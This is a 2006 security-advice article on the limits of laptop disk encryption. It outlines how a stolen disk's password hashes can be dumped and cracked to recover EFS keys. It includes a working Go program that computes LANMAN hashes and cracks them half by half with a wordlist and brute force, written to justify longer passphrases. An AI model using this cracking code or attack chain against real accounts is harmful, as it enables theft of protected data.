Laptop crypto: Do it, but realize it's not a panacea


Ed Skoudis
09.22.2006




This tip originally appeared on SearchSecurity.com

It's gotten so bad that the stories blur together. Five million credit cards on a stolen laptop here, ten million accounts compromised there, followed by over twenty million health-related records on a pilfered machine somewhere else. This depressing deluge is almost certain to lead to enterprise policies regarding laptop encryption and possibly even government regulations for encrypting specific kinds of data. That's good news, right?

Sure, but will laptop hard drive crypto solve the problem of theft? While laptop crypto is nice to have (and will very likely become a requirement for most of us soon), it won't solve the problem entirely. In fact, it might make some things worse.

Imagine a world where pretty much every organization has cobbled together a laptop crypto implementation to comply either with its own policies or government requirements. Company X loses a laptop storing 20 million accounts with very sensitive personally identifiable data. Management chooses not to disclose the fact that the laptop was stolen, because, after all, the data should be encrypted. The crypto should protect the data from the hands of the bad guys. Why bother incurring the wrath of customers and regulators? Some organizations won't disclose to the public or regulators that the data was exposed, because they believe that it wasn't.

Now, here's the rub. For nearly all modern crypto solutions, you are only as safe as the crypto keys. But, with the vast majority of desktop and laptop crypto systems, the keys are stored on the local system, protected by the user's password or passphrase. And, for those solutions seamlessly integrated with the operating system, like Microsoft's Encrypting File System (EFS), the user's operating system account password is typically the sole protection of the crypto key: the EFS private key is wrapped by a Data Protection API (DPAPI) master key that is itself derived from the logon password. For a determined attacker holding the stolen disk, getting the sensitive data is only as hard as dumping the local password hashes from the offline system, cracking the user's password, and then using that password to recover the crypto key. (Simply resetting the password with an offline tool is no shortcut here; on Windows 2000 SP3 and later, a reset leaves the DPAPI master key, and with it the EFS data, unrecoverable. The thief needs the real password.) Once attackers have the password and the key, they can slice through to the sensitive data. Sadly, such an attack is far too easy, especially if weak password representations are still in place, such as the still widespread Microsoft LANMAN (LM) hash, a techno relic from ancient times that plagues many organizations today. LM throws away case, splits the password into two 7-character halves and hashes each half on its own, so a 14-character password costs the attacker no more than two independent 7-character upper-case passwords. With LM hashes stored (the default in Windows versions up through XP and Server 2003), an attacker can crack most passwords in less than a day, and with precomputed tables in minutes.

And, making matters worse, if users aren't trained in using the crypto solution, they may inadvertently bypass it, leaving the data exposed even though the organization thinks the data safe.

As a result, laptop crypto may drive less disclosure of information theft, while still allowing the determined bad guys access to sensitive information. The data is still exposed, but we might find out about it a lot less.

So, is laptop crypto therefore useless? No, it still provides value against the half-witted attacker or petty laptop thief who isn't interested in password cracking or other techniques, keeping the sensitive data from them. But, for a determined, focused attacker, the password will often fail, the crypto key will be exposed, and the data will be stolen.

How can your enterprise deal with this concern? A multi-pronged approach is best. First, in conjunction with the deployment of desktop crypto, you must encourage your users to choose complex passwords, those that cannot be easily guessed or cracked. Educate your users with good awareness programs so that they choose reasonable passwords with a mix of alpha, numeric and special characters. Automated password complexity enforcement tools, such as the Anixis Password Policy Enforcer, can help prevent your users from choosing poor passwords; at a minimum, turn on the length and complexity requirements in the built-in Windows account policy. Going further, set your minimum password length to at least 15 -- or even 20 -- characters to boost your password strength. The 15-character floor is not arbitrary: Windows cannot build an LM hash for a password longer than 14 characters and stores a fixed placeholder instead, so every account at or above that length is automatically out of reach of LM cracking. (For shorter passwords, the complementary fix is the "Do not store LAN Manager hash value on next password change" security policy, which takes effect only when each user next changes their password, so pair it with a forced change.) Now, you might be thinking, "There'd be riots in the cubicles if we made such a change!" But, with your awareness program, work on transitioning your users from the mindset of passwords to passphrases. The latter are easier to remember, easier to type and far less likely to be cracked.
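Both points above (LM discards case and attacks each 7-character half separately, and a 15-character minimum takes a password out of LM's reach altogether) are easiest to see in code. The Go program below is an added example, not part of the original tip and not from any Microsoft or cracking tool: it builds the LM hash exactly as Windows does (DES-encrypt the constant "KGS!@#$%" under each 7-byte half of the upper-cased, null-padded password), then recovers a password by attacking the halves independently, a constructed chunk wordlist standing in for a rainbow table on the first half and a short brute force for the leftover characters in the second. The sample password and wordlist are constructed for the demonstration.

```go
package main

import (
	"crypto/des"
	"fmt"
	"math"
	"strings"
)

// desKeyFrom7 spreads the 56 bits of a chunk over 8 DES key bytes, parity bits clear.
func desKeyFrom7(s []byte) []byte {
	var bits uint64
	for _, b := range s {
		bits = bits<<8 | uint64(b)
	}
	k := make([]byte, 8)
	for i := 7; i >= 0; i-- {
		k[i] = byte(bits << 1) // low 7 bits, moved past the parity position
		bits >>= 7
	}
	return k
}

// lmHalf hashes one 7-byte chunk: DES-encrypt "KGS!@#$%" under the chunk as key.
func lmHalf(chunk []byte) [8]byte {
	c, _ := des.NewCipher(desKeyFrom7(chunk)) // key is always 8 bytes, so no error
	var out [8]byte
	c.Encrypt(out[:], []byte("KGS!@#$%"))
	return out
}

// lmHash computes the LANMAN hash of an ASCII password. ok is false above 14
// characters: Windows cannot form an LM hash there and stores a placeholder instead.
func lmHash(password string) (hash [16]byte, ok bool) {
	if len(password) > 14 {
		return hash, false
	}
	var buf [14]byte
	copy(buf[:], strings.ToUpper(password)) // case is thrown away
	h1, h2 := lmHalf(buf[:7]), lmHalf(buf[7:])
	copy(hash[:8], h1[:])
	copy(hash[8:], h2[:])
	return hash, true
}

// bruteShortChunk tries every chunk of 1..maxLen characters from A-Z0-9
// against one half-hash; maxLen 3 is only 36+36^2+36^3 DES operations.
func bruteShortChunk(target [8]byte, maxLen int) (string, bool) {
	const charset = "ABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789"
	buf := make([]byte, 7) // positions >= n are never written: null padding
	for n := 1; n <= maxLen; n++ {
		total := int(math.Pow(float64(len(charset)), float64(n)))
		for idx := 0; idx < total; idx++ {
			for p, v := 0, idx; p < n; p, v = p+1, v/len(charset) {
				buf[p] = charset[v%len(charset)] // idx written out in base 36
			}
			if lmHalf(buf) == target {
				return string(buf[:n]), true
			}
		}
	}
	return "", false
}

// crackLM attacks the two halves independently: lookup among likely 7-character
// chunks, then brute force for a short tail. Upper-case, since LM never saw the case.
func crackLM(hash [16]byte, chunks []string) (string, bool) {
	table := map[[8]byte]string{}
	for _, c := range chunks {
		if h, ok := lmHash(c); ok && len(c) <= 7 {
			var k [8]byte
			copy(k[:], h[:8]) // a short password's first half is just the chunk's hash
			table[k] = strings.ToUpper(c)
		}
	}
	var result string
	for i := 0; i < 16; i += 8 {
		var half [8]byte
		copy(half[:], hash[i:i+8])
		s, ok := table[half]
		if !ok {
			if s, ok = bruteShortChunk(half, 3); !ok {
				return "", false
			}
		}
		result += s
	}
	return result, true
}

func main() {
	h, _ := lmHash("Password1") // constructed sample password
	fmt.Printf("LM hash: %x\n", h)
	pw, ok := crackLM(h, []string{"", "passwor", "letmein", "welcome"}) // constructed wordlist
	fmt.Println("cracked:", pw, ok)
	_, ok = lmHash("correct horse battery")
	fmt.Println("15+ character passphrase has an LM hash:", ok)
}
```

Run it and the 9-character "Password1" falls to one table lookup for the PASSWOR half plus a few tens of thousands of DES operations for the D1 tail; the cracker returns PASSWORD1 because the case is gone (an attacker would settle it against the NT hash). The empty-chunk entry in the wordlist matters: it matches the second half of any password of 7 characters or fewer. Feed in a 15-character passphrase and lmHash reports that no LM hash exists, which is exactly what the 15-character floor buys you.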

Next, consider augmenting your authentication process with tokens or biometrics in addition to passwords. Some new laptops have fingerprint readers built right in. Card- and USB-based authentication tokens are becoming less expensive and are more likely to be carried in a user's wallet or on a key chain, making them less likely to be stolen with the corresponding laptop. Check how the second factor is wired into the crypto, though: a fingerprint reader or token that merely replays the stored Windows password adds convenience, not key strength, because the encryption key is still derived from that password and still falls to a cracked password. The real gain comes when the key (or a share of it) lives on the token or is released only by it, so that the stolen disk on its own is not enough.

Finally, some particularly careful organizations are prohibiting users from downloading vast amounts of vital data to hard drives. Instead, these users rely on terminal services (like Microsoft Terminal Server or Citrix) to access the data stored on a central repository through a carefully guarded server. The laptop is merely a terminal for viewing data stored elsewhere. The terminal services are carried over a rock-solid, encrypted VPN. Of course, such solutions must be configured to shut off file transfer from the server back to the client (in practice, disabling client drive mapping and clipboard and printer redirection on the terminal server or Citrix farm), or users will bypass any prohibitions against file storage on the laptop either inadvertently or on purpose. But, with such a solution, if a laptop is stolen, it won't have any of the sensitive data on it, helping management and IT sleep a little easier at night.

About the author
Ed Skoudis is a founder and senior security consultant with Intelguardians, a Washington, DC-based information security consulting firm. His expertise includes hacker attacks and defenses, the information security industry and computer privacy issues. In addition to Counter Hack Reloaded, Ed is also the author of Malware: Fighting Malicious Code. He was also awarded 2004, 2005 and 2006 Microsoft MVP awards for Windows Server Security, and is an alumnus of the Honeynet Project. As an expert on SearchSecurity, Ed answers your questions relating to threats.
